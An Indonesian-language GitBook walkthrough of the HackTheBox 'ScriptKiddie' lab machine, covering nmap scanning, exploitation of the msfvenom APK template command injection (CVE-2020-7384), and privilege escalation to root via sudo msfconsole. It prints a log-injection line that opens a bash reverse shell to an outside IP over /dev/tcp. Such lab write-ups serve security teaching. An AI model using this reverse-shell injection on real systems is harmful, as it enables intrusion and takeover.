Bitlab Developers
  • Introduction
  • 🐧Linux
    • Perkenalan Linux
    • DVWA: Install On Kali Linux
    • MYSQL: Kali Linux
    • How To Add Apps In Kali Linux
    • Initial Linux Installation
    • Linux: Fundamentals
    • Linux: Privilege Escalation
  • 💾HackLovers ID
    • Penestration Testing
    • Check Kerentanan Manual
    • Security Models
    • Pentesting Fundamentals
    • Metodologi Hacking
      • Metodologi By Anonputraid
    • Scope Penestration
    • Pengumpulan Informasi
    • 📑Learning Path !
  • SQL Injection
    • Perkenalan SQL-Injection
    • Examining the Database
    • Cheat Sheet
    • Union Attack
    • Subverting application logic
    • Retrieving Hidden Data
    • Blind vulnerabilities
      • Blind SQL-Injection: Triggering Conditional Responses
      • Blind SQL injection: Triggering Time Delays
      • Blind SQL Injection: Triggering SQL Errors
      • Blind SQL injection: Out Of Band (OAST)
  • ⚡Networking
    • Network Fundamental
  • Burp-Suite
    • Burp Suite: List
    • Burp Suite: Profesional Install
    • Burp Suite: The Basic
      • Burp Suite: What is Burp Suite?
      • Burp Suite: How To install
      • Burp Suite: The Dashboard
      • Burp Suite: Navigation
      • Burp Suite: Introduction to the Burp Proxy
      • Burp Suite: Connecting through the Proxy (FoxyProxy)
      • Burp Suite: Proxying HTTPS
      • Burp Suite: The Burp Suite Browser
      • Burp Suite: Scoping and Targeting
      • Burp Suite: Site Map and Issue Definitions
      • Burp Suite: Example Attack
    • Burp Suite: Repeater
      • Burp Suite: What is Repeater?
      • Burp Suite: Basic Usage
      • Burp Suite: Inspector
      • Burp Suite: Views
      • Burp Suite: Challenge
      • Burp Suite: SQLi with Repeater
    • Overview of Burp Suite
      • 📋Burp Suite: Anonputraid Tips
        • Burp Suite: Cross-Site Scripting
  • 🤖Hackthebox
    • Pekernalan Hackthebox
    • Hackthebox Machines
    • Tips & Trick
      • Basic Web Enumeration
      • SSRF & CRLF Attacks
      • Metasploit MsfVenom Apk
      • HashCat: Rules Type Base64
      • Forensic Knowledge
      • Gitlab Laboratory
      • Proxychains & DNS
  • Tryhackme
    • Perkenalan Try Hack Me
    • Learning Path
  • 🖥️Mac Os
    • Catalina Tools
      • Visual Studio Code
    • Dual Boot Kali Linux On Mac
    • How To Change Theme Refind
    • How To Remove Refind
    • Tips to Beautify Terminal
    • Macos For Hacking
    • How To Change Icon Macos
  • Pascal
    • Learning Path
    • Struktur Program Pascal
      • Judul program
      • Bagian Pernyataan/Terproses
      • Bagian Deklarasi
        • Deklarasi prosedur dan Fungsi
        • Deklarasi variabel/perubah
        • Deklarasi Tipe
        • Deklarasi Label
        • Deklarasi Konstanta
    • The Basic
      • Tipe Data
        • Tipe Data standar
          • Tipe Data Integer
          • Tipe data real
          • Tipe Data Karakter
          • Tipe Data String
          • Tipe Sata Boolean
        • Tipe Data Terdefinisi
          • Tipe Data Subjangkauan
          • Tipe Data Terbilang
          • Tipe Data Larik (array)
          • Tipe data record dan file
      • Statemen-statemen
        • Reserved Word
      • Perintah Perintah
        • Statemen Input/output
          • Read/readln(Prosedur)
          • ReadKey(fungsi)
          • Write/writeln(prosedur)
        • Statemen Pengaturan Letak Di Layer
          • Clrscr(prosedur)
          • Gotoxy(prosedur)
          • Delline(prosedur)
          • Insline(prosedur)
          • Delay(prosedur)
        • Statemen Memanipulasi String
          • Concat(fungsi)
          • Copy(fungsi)
          • Delete(prosedur)
          • Insert(Prosedur)
          • Length(fungsi)
          • Pos(fungsi)
          • Str(prosedur)
          • Val(prosedur)
          • Upcase(fungsi)
        • Statemen Perhitungan Aritmatik
          • Abs(Fungsi)
          • Arctan(fungsi)
          • Cos(fungsi)
          • Exp(fungsi)
          • Frac(fungsi)
          • Int(fungsi)
          • LN(fungsi)
          • Sin(fungsi)
          • Sqr(fungsi)
          • SQRT(fungsi)
        • Statemen Transfer Nilai Dari Suatu Variable
          • Chr(fungsi)
          • Ord(fungsi)
          • Round(fungsi)
          • Trunc(fungsi)
        • Statemen Memanipulasi Data
          • Pred(fungsi)
          • Succ(fungsi)
          • INC(fungsi)
          • DEC(fungsi)
        • Statemen Tambahan (warna,suara dan window)
          • Sound(prosedur)
          • TextMode(prosedur)
          • Window(prosedur)
          • Textbackground(prosedur)
          • TextColor(prosedur)
      • Bentuk Perulangan
        • Perulangan FOR
          • Perulangan FOR negatif
          • Perulangan FOR positif
          • Perulangan FOR tersarang
        • Perulangan WHILE-DO
      • Record
        • Deklarasi Record
        • Statemen with
        • Record Dalam Array
        • Field Record Bertipe Array
        • Tipe Data Record Dengan Field Tipe Record
      • Procedure
        • Template Latihan Proseduce
        • Parameter Dalam Procedure
        • Pengiriman parameter Secara Nilai
        • Pengiriman Parameter Secara Acuan (By Reference)
        • Procedure Memanggil Procedure Yang Lain
        • Procedure Tersarang
        • Procedure Memanggil Dirinya Sendiri (Rekursi)
      • Function
        • Rekursi Pada Function
        • Parameter Nilai Dalam Function
        • Function Dengan Parameter Acuan
        • Function tanpa parameter
      • File Teks
        • Membuat File Teks
        • Deklarasi File Teks
        • Pernyataan Rese
        • Pernyataan Rewrite
        • Pernyataan Close
      • File Binary
      • Pascal Library
        • Free Pascal Game
        • SDL: Simple DirectMedia Layer
          • SDL: Language Bindings
        • How To Install ?
      • Pascal Examples
        • Pascal Exercises
          • Exersices 1
          • Exersices 2
          • Exersices 3
          • Exersices 4
        • Pascal Quiz
          • Question 1
      • Perkenalan Pascal
  • Dart Programming
    • Install Dart On Linux
  • ⚙️Technical
    • Pengantar Sistem Informasi
    • Perkenalan UEFI & Legacy
  • Git Dan Github
    • Download Git & Setting
    • Membuat Portofolio GitHub
  • Xampp
    • Error Mysql Xampp
Powered by GitBook
On this page
  • INTRO
  • Nmap
  • CVE-2020-7384
  • CVE-Like
  • Privilege Escalations

Was this helpful?

  1. Hackthebox
  2. Tips & Trick

Metasploit MsfVenom Apk

Author: Zulkarnaen

Last updated 2 years ago

Was this helpful?

INTRO

HackThebox ScriptKiddie Adalah Box Dengan Tingkat Kesulitan Mudah, Tingkat Mechine Matrix Lebih Mengarah Ke CVE-2020-7384 , Application Yang Retan Dimesin Tersebut Adalah Metasploit MsfVenom Apk Tamplate , Exploitation : Metasploit MsfVenom Apk Tamplate Cmd Injection , Bash For Loop , Description Kerentanan : Tamplate msfvenom Metasploit Rapid7 menangani file APK dengan cara yang memungkinkan pengguna jahat membuat dan menerbitkan file yang akan menjalankan perintah sewenang-wenang di mesin korban.

CTF:

  • CVE

  • CTF Like

Alat - Alat Hacking :

  • nmap

  • Metasploit

  • Linpeash

  • Bash

  • Python

  • nc

Nmap

Tipikal langkah pertama Saat saya Melihat Port 5000.

output :

5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)

Kami menemukan 3 Tools Di Server HTTP Target :

  • Scan Top 100 ports on an ip

  • Venom it up - gen rev tcp meterpreter bins

  • Searchsploit FTW

Tambahkan Domain Berikut Kedalam Daftar Local Host : 

sudo nano /etc/hosts + 10.10.10.222 scriptkiddie.htb

CVE-2020-7384

Setelah beberapa jam menjelajah , Kami Menyadari Bahwa , Tools Payload Rentan Terhadap Serangan Injection . Jenis Kerentanan Tersebut Adalah :

Tamplate msfvenom Metasploit Rapid7 menangani file APK dengan cara yang memungkinkan pengguna jahat membuat dan menerbitkan file yang akan menjalankan perintah sewenang-wenang di mesin korban.

CVE-Like

Cara Mengexploitasi Kerentanan :

  • Open Metasploit , Gunakan Modul Metasploit_msfvenom_apk_template_cmd_injection , Jika Tidak Ada , Download Module Dan Tambahkan Kedalam Folder Metasploit e.g /usr/share/metasploit-framework/module/exploits/unix/fileformat/

  • Setelah Berhasil Didownload , Set Lhost Menggunakan Ip Server Kalian , Lalu Ketik Run .

  • Setelah File Template Nya Jadi , Upload File Tersebut Ke Server Target , Dibagian Template , Lalu Dibagian Lhost Masukan Ip Kalian , Sebelum Disubmit , Hidup Kan Netcat Sesuai Port Yang Telah Anda Set

  • Dan Jika Berhasil Anda Akan Mendapat Kan Shell User Kid.

Privilege Escalations

Ok kita Harus Dapatkan Akses User pwn , ayo Dapat Kan Akses Root Nya .

Setelah Berapa Jam Mencari Celah Menggunakan Linpeas , Untuk Masuk Sebagai Root , Akhir Nya Kita Mendapati , Bahwa File , scanlosers.sh Pada Folder /home/pwn , Itu Membaca File /home/kid/logs/hackers , Setelah Saya Mencoba Berpikir Lebih Keras Bagaimana Cara Mendapatkan Shell untuk user pwn , Akhir nya Kita Menemukan Jalan Nya

Lakukan Perintah Berikut :

  • Pertama Saya Akan Memeriksa , Dari Mana Asal File /home/kid/logs/hackers , Dan Apa Proses Apa Yang Dijalankan Untuk File Hackers Tersebut , Setelah Berapa Lama Berpikir Akhir Nya Kita Menemukan Kejanggalan Nya .

  • Ketika Tools Payload Pada HTTP Server Port 5000 Dijalankan , Maka Secara Otomatis Logs Pada Tools Tersebut Akan Disimpan Kedalam FIle /home/kid/logs/hackers . Kalian Bisa Mencoba Nya Dengan Perintah Berikut : 

while :; do cat /home/kid/logs/hackers ; done

Setelah Itu Gunakan Tools Payload Pada Website Target , Dan Kalian Akan Mendapatkan Logs Tools Tersebut Di file hackers .

Perhatian : Logs Tersebut Hanya DIcatat Difile /home/kid/logs/hackers Itu Berfungsi Jika Kalian Hanya Menggunakan Tools Payload Android .

Oke Sekarang Kita Sudah Tau Cara Kerja File /home/kid/logs/hackers Tersebut , Tinggal Kita Exploitasi Kecatatan tersebut Dengan Cara : 

while :; do echo "[2021-02-09 13:20:00.634706] 10.10.14.73 ; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.10/4242 0>&1' # " > /home/kid/logs/hackers ; done
python3 -c "import pty;pty.spawn('/bin/bash')"

Lalu Jalankan Netcat , Dan Gunakan Tools Payload Pada Website Target , Bersamaan Dengan Template Nya .

Jika Berhasil Anda Akan Mendapatkan Shell User Pwn .

Pada Bagian Ini Cukup Mudah Untuk Dicerna , Kalian Hanya Tinggal Mengketikan sudo -l Anda Akan Melihat Bahwa file /opt/metasploit-framework-6.0.9/msfconsole Bisa Digunakan Tanpa Password : 

(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

Anda Bisa Menjalankan file Tersebut Menggunakan Sudo Dan Ketika Kalian Berhasil Masuk Kedalam Tools Metasploit , Lalu Jalankan Perintah Berikut : 

/bin/bash -i

Dan Boom , Kalian Akan Menjadi Root Sekarang : )

Download Disini :

🤖
Metasploit_msfvenom_apk_template_cmd_injection.rb
ScriptKiddie